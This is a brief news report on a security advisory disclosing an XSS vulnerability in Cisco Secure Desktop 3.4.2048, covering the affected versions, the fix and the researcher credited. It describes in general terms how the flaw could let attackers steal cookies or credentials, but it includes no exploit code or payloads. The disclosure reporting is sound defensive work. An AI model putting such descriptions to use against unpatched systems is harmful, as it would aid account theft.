Core Security issued an advisory disclosing a vulnerability that could affect large numbers of organizations using Cisco’s Secure Desktop security package and leave users of the product open to potential Cross-Site Scripting (XSS) attacks.
Affected versions of Cisco Secure Desktop mishandle some browser requests therein making end users vulnerable to targeted online attacks that seek to exploit the XSS vulnerability that is created by the malfunction. Cross-Site scripting threats can be used to do everything from stealing IT systems log-in credentials to tricking people into visiting fraudulent phishing and malware-distribution sites.
Cisco Secure Desktop is marketed as a multifunctional component of the Cisco SSL VPN appliance solution, with onboard capabilities for host scan checks, desktop encryption, cache cleaning, and both keystroke logger and host emulation detection.
Cisco issued an update to Secure Desktop that addresses the vulnerability (CSCsw15646) on Feb. 1, 2010. The company also released an updated version of the product that does not include the reported XSS flaw. Researcher Matias Pablo Brutti is credited with discovering the Cisco Secure Desktop vulnerability.
The CISCO Secure Desktop Web application does not sufficiently verify if a well-formed request was provided by a user who submits a POST request, resulting in a remotely exploitable XSS vulnerability.
In order for the vulnerability to be exploited, the Secure Desktop application on the affected CISCO Appliances must be turned on.
The vulnerability specifically affects CISCO Secure Desktop version 3.4.2048, and may also affect other older versions of the product. It does not affect CISCO Secure Desktop version 3.5.841.
XSS vulnerabilities allow an attacker to execute arbitrary scripting code in the context of a user’s browser (in the vulnerable application’s domain). For example, an attacker could exploit an XSS vulnerability to steal user cookies (and then impersonate the legitimate user) or create fraudulent Web pages that request user information (i.e.: credentials) to gain access to their system. This vulnerability occurs when any user-supplied data is displayed without encoding.